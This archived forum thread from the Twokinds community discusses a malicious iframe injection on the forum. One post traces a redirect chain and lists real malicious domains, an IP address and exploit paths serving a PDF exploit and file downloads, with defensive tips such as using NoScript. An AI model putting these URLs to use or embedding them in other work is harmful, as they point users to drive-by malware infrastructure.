Twokinds ARCHIVE Forums

Seems to be... Currently, there seems to be code on each of the pages. (To see it, view the page source that you're on (seemingly regardless of the style you're using), and look for the words plgbn15(p) and flbn15(p)). The first block of code, executed and evaluated, does this:
while the second does this:


Both of these attacks are known as malicious iframe attacks (read more here, here and here. For more info on iframes, check wikipedia. In each case, the iframes trigger a series of redirections, and I managed to partially trace them through a bunch of websites. (Partial because my modem decided to crash midway.)

The websites are listed in the order that they were requested by the malicous iframe:
add-content-block.net/t/?13559b21a (The last part is always somewhat random and will vary.)
analystic.org/in.cgi?16&e1d9f8 (Ditto, as far as I can tell.)
analystic.org/potok.php
analystic.org/in.cgi?8
xdrv.info/uno/count.php?o=2
busyhere.ru/in.cgi?pipka2
xdrv.info/uno/count.php?o=7
xdrv.info/uno/exploits/x18.php?o=2&t=1223824153&i=3707701169 -- this opened a pdf
66.212.19.146/g/index.php -- autorun a file
66.212.19.146/g/pdf.php -- downloads a file
pornarrows.com/none

In each case, the loading is fairly undetectable - the most you'll see is "Loading analystic.org/potok.php...", and briefly at that. As far as I can tell, this takes advantage of a vulnerability in Adobe Acrobat to do something. I'm not sure what, running it in a sandbox caused Acrobat to crash badly.

At this point, I can't do anything, beyond trying to trace the entire route it takes, which I can't right now for various reasons. However, I believe that using Firefox with NoScript (not just Firefox alone) should prevent this attack from succeeding. One thing that you can check is C:\Documents and Settings\All Users\Start Menu\Programs\Startup and see if there's a file called browsers.exe? If there is, delete it. That's the only reference I came across that had a reference to a specific file.

I'll continue this tomorrow (in about 7 hours or so if you're counting), but in the meantime KitWiz and Robbiethe1st, among others, will probably have some insights into this whole thing. Also, sorry to Yash for starting on this topic in the Ranting Board and derailing one of the topics.

I am sincerely hoping that someone will find a way to prove me wrong, but to me it looks as if the 2kinds forum has been a victim of a malicious attack, whether automated or targeted at 2kinds.

Chrome gives it's anti-malware warning on the front page as well. =/

It was the people from phoenix req with their vote bots and trying to kill our computers >.<

It may be because I'm slogging through the middle, worst part of a bad cold but I really don't understand anything that happened seven inches above this post...

Forum... broke?

I am personally bringing this matter up to Tom. This could possibly a serious security violation that affects almost every user on the Twokinds forum. Hopefully, he will have the time to respond.

*EDIT* PM sent. If he responds to me directly, (and allows me to post his message) I will post his response in this thread.

Wonder if that's what is making my computer load slowly...

But allowing "2kinds.com" is still okay with NoScript? Just checking..

NoScript notifies about said "add-content-block.net", but ALSO about "bibilon.net" and "recentl.cn". Are they similiar to this or should they be there?

@Fast and others who didn't read/understand, Forum didn't break. It's users are under computer security threat. NoScript for Firefox ought to keep you safe.

Sorry, I've been a tad bit busy for the past few days but I'll check Tom's php coding directly....

Jeez, Kit, don't overload yourself...

*Also apologizes for aiding and abetting the aforementioned thread derailment*
<<;

This NoScript for Firefox...it is an add-on, I take it? Would picking it up now be a case of too little, too late?
o.o

Hmm... interesting... My copy of NoScript is only warning about add-content-block.net. Shall keep an eye out for those sites later.

Anyway, yes, 2kinds.com is technically safe to allow - the iframe will load, but NoScript prevents it from doing anything, and the other features of the forum that use JavaScript will remain unaffected.

The strange thing about this is that immediately after the malicious script, this comment appears:
I checked twokindscomic.com, and there's no immediately obvious link (as in hyperlink) to 2kinds.com, which makes me think that the server 2kinds.com is hosted on itself has been compromised. If 2kinds was targeted, I don't think someone would put in the wrong address.



Not necessarily. In this specific case, yes, it would be too late, but I'd say get it anyway, because it would prevent attacks like this from happening to you in the future. If the forum's server is compromised, the forum itself could be reinfected once cleaned, or even if you go to another page that's infected, you would be silently attacked again. I think it's better to reduce the potential of attacks. =)

I'm going to continue working on this today at school (which I'm leaving for in about 10 minutes) and post anything new later. Have a good day/night to you all. (And get better soon Fast!)

Something happened....

The forum was down for awhile, now it's back.. er...

Is this phpbb 3?

I'm not sure. The format is different, though I'm not sure if I like the new layout. Very grey, drab.

Edit: Ugh, my avatar just got crushed, too.

This reminds me of others I've seen, especially with the "User Control Panel" instead of the profile. Methinks it is 3.

And same with mine, though, to a less degree.

Should I or someone else start a new thread about the new board?

I'm now using the new default default "prosilver" theme. It's... very blue.
... but avatars on the right doesn't seem to fit TwoKinds Forum very well...